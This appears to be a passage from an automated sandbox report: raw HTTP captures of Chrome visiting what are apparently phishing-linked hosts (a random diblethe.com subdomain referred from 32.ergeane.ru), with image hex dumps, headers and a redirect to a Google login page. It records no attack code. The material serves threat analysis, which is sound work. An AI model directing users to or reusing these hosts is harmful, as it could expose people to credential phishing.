                                                                                                                                                                                                                                  x-amz-request-id: F3KQ37YXZ9TVGVHR
                                                                                                                                                                                                                                  Last-Modified: Tue, 05 Dec 2023 01:19:11 GMT
                                                                                                                                                                                                                                  ETag: "428183bfb7c31d8c3bcc985dac004681"
                                                                                                                                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                  Cache-Control: max-age=84600, must-revalidate
                                                                                                                                                                                                                                  x-amz-version-id: pafjt1WRdKFeFq9Cn_ncOtPAOJJamed.
                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                  Age: 16470
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Set-Cookie: __cf_bm=wRUGrbxA9AELHJ4cTHJwKs4j1qXDKqJa1Pgjf09YU_Q-1734550104-1.0.1.1-J._13cXHYuAzy2kXPPb_rXhS7H6AcyQW3fmllIWPH6oBk86aYFdnOvFEpgqvu37EVIMs8HpC2n2mSJyz1uCTRA; path=/; expires=Wed, 18-Dec-24 19:58:24 GMT; domain=.prod.website-files.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418e48e9be8cdd-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC412INData Raw: 52 49 46 46 2a 9f 01 00 57 45 42 50 56 50 38 20 1e 9f 01 00 b0 3e 06 9d 01 2a cd 06 d3 03 3e 91 46 9d 4b a5 a3 a3 2c a4 b4 39 41 90 12 09 69 6e fc 66 c7 59 0c d2 1b b1 ba dc a8 13 20 6a 2e 19 b3 a7 7f 93 ee ad bf d6 f2 e6 5f fb 29 7c 75 e8 c2 ff e6 f9 82 02 3d f8 3f dd ff 17 f9 03 27 4d cb 9e 57 bc dd e6 cb fc df fd ff 63 1f d9 7f dc fb 01 fe ac 74 ab fe ff fe ab f5 e3 dc 37 ed 27 ed 9f bc 6f fd 3f dc 8f 7b 5f d9 fd 40 3f 93 7a 5c 7a 99 7e f4 7b 07 ff 20 ff 43 ff ff da 57 ff 5f b2 ef f7 cf fc de b5 9f f5 7d 40 3f ff fb 6a 74 a7 f8 7f f3 ef eb 3f d8 3f c2 7f 91 fe b1 ff ff e5 2f c7 ff 3c fe cd fd af fc 5f f9 5f ee 1e 8e fe 47 f3 cf e2 3f b7 7f 96 ff a7 fd e3 da 5f fc 0f f2 1e 1b fd 17 f9 5f f7 5f e1 bf ce fb 11 fc 9f ed b7 e5 7f bb 7f 96 ff c5 fe 13 e6 87
                                                                                                                                                                                                                                  Data Ascii: RIFF*WEBPVP8 >*>FK,9AinfY j._)|u=?'MWct7'o?{_@?z\z~{ CW_}@?jt??/<__G?___
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: a3 ff 6b fb 9b ed eb f4 6f f4 df fb 7f d3 ff b7 f9 09 fe 75 fd c7 fe c7 f8 ef f4 bf b7 df ff ff ff fd 7f ff ed f8 6d f9 ff ff ff e2 7b f7 ab ff ff ff 71 cc df 2d ee f9 66 10 24 4d f2 cc 20 45 17 00 ac f3 ff 0f 2e de 4c 27 26 9f cd 5e 7f e1 e5 db c9 84 e4 d3 f9 ab cf fc 3c bb 79 2b b9 2d b9 2b 8b 92 35 f7 88 ec b7 05 12 e2 d0 aa 62 c0 1f 97 46 54 4d f2 a4 63 ac f3 d3 1a fa ec f3 fe df 7f bf af 0b e7 03 4a 4d 41 a4 a1 dc ba 24 c3 00 c6 60 2b f1 78 91 5d 15 b4 a2 20 1c dc 37 6b 63 7c b2 ef 35 fe 11 aa eb 25 cd 78 15 57 7b b6 80 26 34 a8 19 b1 d3 0a d8 3a 07 74 0e e8 1d d0 3b a0 77 40 ee 81 dd 03 ba 07 74 0b e0 28 b9 54 29 61 36 46 c6 eb d0 fd ca aa 12 96 8a ac 22 8b b1 b8 fb fc ea 25 5c 75 c8 ba d2 bc fe 27 44 0b 9f 80 05 e2 11 9a b5 a5 d9 7d 10 13 33 fc 02
                                                                                                                                                                                                                                  Data Ascii: koum{q-f$M E.L'&^<y+-+5bFTMcJMA$`+x] 7kc|5%xW{&4:t;w@t(T)a6F"%\u'D}3
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 4c 3e 36 4f e5 d1 95 13 7c b3 08 12 26 f9 66 10 24 4d f2 cc 20 48 9b e5 98 40 91 37 cb 30 81 22 6f 8d 40 ff 80 fd f1 8c 50 08 b4 b9 1f 76 3e e1 c4 54 23 56 75 3e e3 05 46 4d ec 13 46 cc 5c ce 32 bc b9 b4 03 dd 7d f9 20 81 8d fa 4e 09 20 92 98 da a1 4d fe d6 88 1b 76 25 cb 55 a2 60 61 82 ef 22 bd 79 77 34 fe 66 2d f0 e8 08 a9 07 29 eb 05 3f a7 43 95 b2 b0 b1 3e e2 fc f8 3b 8d f9 ff 87 97 6f 26 13 93 4f e6 af 3f f0 f2 ed e4 c2 72 69 fc d5 e7 fe 1e 5d bc 98 4e 4d 3f 9a bc ff c3 cb b7 93 09 c9 a6 b8 dc 8d 15 ae 19 d5 cd a3 b9 b4 13 46 5a b4 c3 b5 26 1f f1 20 21 34 0b ee 82 5b 5d 8c aa c0 e7 15 e3 4a fe 92 d5 f2 19 5a 2a 98 63 24 16 7e c9 78 61 3e 5f 8b 2b d4 7b 72 69 74 88 42 9b a2 ed c2 49 cf 52 ed f4 64 7c 94 25 62 af 25 a9 ae 4f 7c 94 15 22 2d 1d 89 4d ce
                                                                                                                                                                                                                                  Data Ascii: L>6O|&f$M H@70"o@Pv>T#Vu>FMF\2} N Mv%U`a"yw4f-)?C>;o&O?ri]NM?FZ& !4[]JZ*c$~xa>_+{ritBIRd|%b%O|"-M
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 5b b5 91 06 c8 8c 53 c2 f4 eb a9 bc 65 3c 58 e1 c2 05 6b f9 d3 2e 38 b8 4d 7c f3 44 d8 66 18 af 75 f8 24 8d c3 ab 04 f5 f8 0f ff 91 74 25 c4 3a c2 71 03 6d 7b 73 ed 44 cc f0 3d 7b f4 b9 60 c0 2e cc 49 a8 6a f5 1f 73 26 fc 38 6a fe 13 f6 d4 40 44 56 64 a1 8b b8 e2 ec b6 55 92 88 1c cb 46 4b 38 73 70 41 e9 b2 66 48 25 60 26 70 b8 61 02 44 d5 14 3c 1a 0a 89 b1 df 40 90 51 d8 e2 a0 b8 dc a4 44 b0 6d 5e ee 2e bb 8d ca 7f 86 85 a2 ce b1 49 e4 bd 73 54 5c 38 14 e8 28 64 bc f8 fe 27 97 a7 8e f4 64 6f e3 3b 94 b1 7a 8a de e7 4a d6 3f fb 77 17 5d a6 e6 4d 7d 74 59 62 6f 15 00 3c 1c 48 b7 6b 00 71 30 16 5f 9f 4f d1 b9 29 e1 92 7b 72 f5 ed 8f 47 18 a9 98 ba 05 14 c6 9d f0 fb d5 8d 3a 3b 1b 6f 75 50 43 a0 77 a7 f4 cd cc 95 e9 2f 96 64 8c 6e 08 a2 2b a3 72 5b 2e ac 0d
                                                                                                                                                                                                                                  Data Ascii: [Se<Xk.8M|Dfu$t%:qm{sD={`.Ijs&8j@DVdUFK8spAfH%`&paD<@QDm^.IsT\8(d'do;zJ?w]M}tYbo<Hkq0_O){rG:;ouPCw/dn+r[.
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 41 90 4e 69 ca fb ad 61 ec 7d 85 23 35 ec 20 dc 42 bf 6d 4b 2b 9f 04 3a 3c 58 00 2f 86 31 9e 71 2b 34 97 6b c6 11 81 26 39 48 56 4b 83 6c 2f 79 36 ff 0b f5 eb 65 fc 23 90 1d 69 15 79 a7 2e cb 40 df 9d a1 e0 e4 78 05 11 f4 37 d0 52 c1 98 c8 78 13 39 18 30 3c bf f4 d8 76 ec ba 3b 52 9f f9 de 92 f9 66 08 de 63 93 ee 84 56 82 41 a3 2a 13 80 ff 9f 70 e3 98 8e b1 e4 a2 ef ab 8a 15 f6 06 75 c3 23 9c 23 6f 0e 90 7a fb e6 07 b6 51 77 c3 6a 28 dd 5c ac ce 2e c8 40 3b 6f c6 d8 3d 6e 39 e9 6c 34 ff 36 0a d9 43 d5 52 86 e4 95 5f 22 76 db 40 fc 04 ab b6 be 9c de c8 a3 c9 05 4c c2 36 83 a0 a1 92 f7 d9 11 f9 f3 52 f3 e4 d6 be 13 d1 3c 38 d0 15 5a 45 4e 19 3a 1b 30 1b f3 14 1f da 89 10 6a 1e 0f e5 07 5e 83 6f fd e4 34 56 c6 fc 37 97 d4 1e ca e4 65 5d d9 23 44 35 c8 b1 1f
                                                                                                                                                                                                                                  Data Ascii: ANia}#5 BmK+:<X/1q+4k&9HVKl/y6e#iy.@x7Rx90<v;RfcVA*pu##ozQwj(\.@;o=n9l46CR_"v@L6R<8ZEN:0j^o4V7e]#D5
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 3b b3 91 41 80 b6 29 90 34 54 97 97 60 d0 23 ec 0c d9 55 5f fa 43 86 4a 6a 17 fa 0a 1a 3c eb 19 1b 11 a1 ea 9d 62 1e 13 08 71 87 6f 27 4b d9 b1 d6 1f cd ec 9a 60 86 56 7d 93 2c 06 12 24 53 1c 98 96 cb d5 5e 28 2f 15 6c 98 d6 3d 24 66 2f 19 93 13 2c 61 11 4e 1d 0d 14 a6 43 96 19 e7 b8 79 e3 43 b5 c8 55 89 33 d4 3b c0 9c 97 71 73 f2 63 e5 f4 64 87 ae a1 ed 52 d5 3a 98 b2 b4 d4 e3 2e 04 a0 cb fd 1e 62 de e5 95 a6 a6 fd 85 f3 8c 79 41 eb 6e f9 e5 fb 16 61 12 2f 69 42 35 59 27 0d 0f 53 f8 3b bb 15 e9 c2 85 cd 65 f7 e4 99 e9 ae 8a 06 b5 04 46 28 68 44 ea 27 1a 35 dc 38 13 3e 4e 82 b3 c2 89 db 28 fa 9a f8 ec 42 68 ad be 17 29 80 04 d5 4f 57 43 45 6c 6f 99 64 d3 1a 7a 1e 8a 5a 7b bc ff c3 cb b7 93 09 c9 a7 f3 56 e2 9e a9 1e e9 ca ea 2a f1 76 37 25 f8 8b 09 e0 dd
                                                                                                                                                                                                                                  Data Ascii: ;A)4T`#U_CJj<bqo'K`V},$S^(/l=$f/,aNCyCU3;qscdR:.byAna/iB5Y'S;eF(hD'58>N(Bh)OWCElodzZ{V*v7%
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 03 a1 a9 16 1a 98 f8 36 b2 35 fe 23 b8 dd c9 33 d3 64 82 34 24 8b 7c 21 ad 10 95 1a f1 a9 5f b9 1e fe b5 aa 9f 3f 6e 5f 39 ee f8 f9 3e 21 43 4d 0e 88 f0 7a 48 9b e5 98 40 91 49 b0 e9 34 03 cc 44 ed 5a 3e 17 e1 e5 db c9 84 e4 d3 f9 ab cc c1 ec 06 dc 60 c7 f4 3c b2 6d 9f b8 3e 8a 3c 17 e9 14 38 b2 72 69 fc d5 e7 fd 93 27 7e 03 76 79 ff 87 97 6f 25 30 70 61 1c 91 8d d9 e7 fe 1e 5d bc 98 4e 4d 3f a9 73 7d 97 aa bb e5 bc 30 17 1a 59 2f 62 79 e9 d9 80 92 13 11 3a 0f 35 b2 bb c7 d9 fd 93 d0 0a 7e 5e 93 13 5e d5 6d 1c b6 5d 01 bd 60 d6 4b 74 78 7d 40 b2 eb 0c 07 f6 7e 8d 8a ca dc 53 15 40 30 73 47 19 d8 28 49 11 e1 f2 ac 63 20 c7 10 17 e2 2c 76 92 74 0b cf d8 36 61 02 44 de 16 61 f7 b1 80 a9 67 56 5c 09 2f de 62 6f 9e ac 68 7e 9c bc 72 2a ba a7 8e 6e 6f 9a e7 3b
                                                                                                                                                                                                                                  Data Ascii: 65#3d4$|!_?n_9>!CMzH@I4DZ>`<m><8ri'~vyo%0pa]NM?s}0Y/by:5~^^m]`Ktx}@~S@0sG(Ic ,vt6aDagV\/boh~r*no;
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 90 5b 38 f5 4d 44 3c d1 1a d3 63 fb cf 9b 71 b2 45 49 c6 a3 9f d8 e6 e2 21 3c 98 49 c9 a7 f3 57 9f f8 79 76 f2 60 cc ff 0a a5 6f 46 84 42 f9 18 ef a3 0f 2e de 4c 27 22 09 c8 9b b7 91 7d c5 84 f3 57 9f 10 d7 22 c4 b1 39 34 fe 6a f3 ff 0f 2e dc fb 16 16 37 da 13 f2 06 de 00 e1 7d 83 fb 7e cd 5f 0d bd d6 da 5c 72 d1 ef fd 0e 3c 73 c2 b9 bb 2a db b8 a3 83 b4 50 75 76 49 84 bf b9 6c 14 43 f7 0e 43 ef aa fd dc 5a 8e 91 b3 b1 aa 43 99 f1 ff 23 9e da 85 2a 44 21 f5 43 85 8f be d8 32 18 13 01 78 d6 fe 8b b6 5b f2 cb 70 85 d2 32 30 1f e1 42 09 06 c5 a0 cb 12 d9 9a e2 e8 e0 42 f9 5d 59 da a6 4f 35 96 f7 29 cf 35 a6 58 e8 3b 52 ae fa 83 84 68 6e f2 80 fa ed 76 3c 45 13 3b a2 59 d7 4d f1 67 de 50 58 87 03 01 61 08 96 65 9e f3 f7 78 62 39 8b 11 23 3c 2a 1e 61 d1 2c 6a
                                                                                                                                                                                                                                  Data Ascii: [8MD<cqEI!<IWyv`oFB.L'"}W"94j.7}~_\r<s*PuvIlCCZC#*D!C2x[p20BB]YO5)5X;Rhnv<E;YMgPXaexb9#<*a,j
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: 7b 12 9b 9c ed 07 c9 42 56 2a e0 4d 0f d9 28 29 f4 ef 33 62 7e b6 06 c6 4b f4 e2 2d 1d 89 4d ce 76 83 e4 a0 ba 50 12 3f 9e a2 fd 38 88 2f 62 53 73 9d 92 b5 68 03 5a c5 e4 b5 35 c9 ef 92 82 a4 45 a3 b1 29 b9 cc 26 7c 17 46 7e 22 0d cc 57 f8 84 e9 74 93 fb 7e 58 0a e4 5c ad 58 6e 36 b5 55 97 f3 d9 66 10 21 c1 3a e9 db d8 46 95 63 cd e7 5f c1 20 d7 b2 86 7c e7 a1 30 99 3d 74 93 e2 c4 d9 0a fd 6d c9 56 13 79 57 00 9f 08 24 55 ff 66 f9 40 28 a9 f7 25 d2 73 aa 86 29 1a e1 f3 65 e3 84 ae 5d 19 51 37 86 c8 ae 9c fb b0 91 05 2b 2c b4 72 65 06 7a 82 85 09 a4 6c a3 7b e9 35 c8 3f 13 2c 23 e5 f3 fc 2c 92 aa 36 e9 7c e4 ae ac b9 2d 9c 32 9f 72 3a db 4d 90 3e 2c b9 37 6e 80 a2 49 32 6f 75 8a 33 05 af 1d 55 1a ae 85 25 2d 17 91 86 61 78 88 b3 b5 9a 1f f2 62 89 bd 97 c4
                                                                                                                                                                                                                                  Data Ascii: {BV*M()3b~K-MvP?8/bSshZ5E)&|F~"Wt~X\Xn6Uf!:Fc_ |0=tmVyW$Uf@(%s)e]Q7+,rezl{5?,#,6|-2r:M>,7nI2ou3U%-axb
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC1369INData Raw: bf 2b 7d 2c c2 04 8f 5d 4f 47 f7 86 84 50 0e 0d 83 8c c8 5d eb 72 df 61 88 28 df 96 6f 14 6b f0 5c aa a4 59 ef 41 4c 74 d6 06 df a3 38 a0 b8 28 19 e3 2a 06 fc d0 ab 6b c7 fd f1 49 2c cb ad 1d a7 24 6c 0c c2 50 a4 0f f1 cb 03 36 ea b9 7d d6 03 9b 8b 9b 2e a1 fa a9 21 31 ef 18 ff 36 12 a2 50 16 9e 5a 24 d9 59 35 22 57 87 af c3 65 1f 57 41 93 68 f1 c2 22 2e f9 a2 82 79 c2 dd da 4e 26 37 90 39 10 33 4d 6c ff 90 92 84 a2 ba b2 6f e1 87 05 44 65 91 3c ee d7 e7 9e 09 3d 90 7e 2d 05 4d 36 8d d6 a8 3b 17 24 eb a4 21 64 47 22 cd f4 f2 16 99 d7 f2 0a f5 d8 c0 ec 5c b8 39 3e 56 65 ff bc 89 82 cf c3 cd 7f a2 04 5f 43 18 e6 02 0a 01 47 17 9b 0e 64 10 05 1c 66 98 c4 f8 7d 43 59 34 db f6 39 94 77 f2 b4 7d 96 fd ea 81 ca 0e 9b 5f ae f2 0c ec 68 fc 08 47 2e 35 7f b7 9d 79
                                                                                                                                                                                                                                  Data Ascii: +},]OGP]ra(ok\YALt8(*kI,$lP6}.!16PZ$Y5"WeWAh".yN&793MloDe<=~-M6;$!dG"\9>Ve_CGdf}CY49w}_hG.5y


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  28192.168.2.1649742104.21.112.14436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:30 UTC652OUTGET /RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUW HTTP/1.1
                                                                                                                                                                                                                                  Host: 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://32.ergeane.ru
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://32.ergeane.ru/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:31 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:31 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMiM8dNmHJmx%2B3Rj5h3d7x82e12Wbtd3WMrLXZ8SWFOGhRvC30f5RIXTexahCDbjjDGJ4JerdklZU6jb%2Fj5joIQAU982wQWQroE6YjzohmMfrLDtHXUq337mSD4Cwkc8Csq3UAqHTvHET9flDVYDg2dolyumS87Jz3g0LWXW2aXDxi%2B1x1Os0EMXEmRF542AFtTucw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418e719f81424b-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1606&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1230&delivery_rate=1818181&cwnd=248&unsent_bytes=0&cid=add040b18a002a96&ts=1101&x=0"
                                                                                                                                                                                                                                  2024-12-18 19:28:31 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                                                  2024-12-18 19:28:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  29192.168.2.1649746142.250.181.1104436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:33 UTC790OUTGET / HTTP/1.1
                                                                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Referer: https://32.ergeane.ru/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:34 UTC2146INHTTP/1.1 302 Found
                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                                                                                                                                                                  Location: https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://docs.google.com/&followup=https://docs.google.com/&emr=1
                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-gJ5qc7qVLXIqpwrI06duzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DocsHomeRedirectHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DocsHomeRedirectHttp/cspreport/allowlist
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DocsHomeRedirectHttp/cspreport
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DocsHomeRedirectHttp/cspreport/fine-allowlist
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:34 GMT
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Set-Cookie: NID=520=QQynn9tS2XiLcdGYY05yl7KIJEIKLU9wN3jIcVSvYZNtR2dlvtQMBYuDCSMb-g_dI3aDOXxETqtVjjpLAb_uVefZrmOCPaEc3MLPTu71Vv24pDdyNCxx-sGwa7y16b5VbqNxnZKg4XDQeUsBwBYWPa5QxACm2LKbJ1y8xC6m0_EKGAFst39tq3ZM; expires=Thu, 19-Jun-2025 19:28:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  30192.168.2.1649747104.21.112.14436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:34 UTC452OUTGET /RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUW HTTP/1.1
                                                                                                                                                                                                                                  Host: 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:35 UTC901INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:35 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8HiPOdaVwjQ3E9EydklcmF2T4O%2FE0oYISRVpp3lTkQrnACQfRVyViKVJxan5da2DWFu%2BI8IRsq95Wi1GMQfEXtsJlmT50t1GPA5gUPm2LmLggx0i2bPiX%2BWsuN%2FSeBXD%2Bc2DnVb%2FMO3LQe7Jf1Fu4ZCW2dtqWNGngMg5kaAiUsW76X1%2FqktHphQ3Bpcfp%2BPtaGc0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418e88fda4424b-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1584&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1030&delivery_rate=1843434&cwnd=248&unsent_bytes=0&cid=3199e7cfd6f6f251&ts=1089&x=0"
                                                                                                                                                                                                                                  2024-12-18 19:28:35 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 11
                                                                                                                                                                                                                                  2024-12-18 19:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  31192.168.2.1649765104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:48 UTC809OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
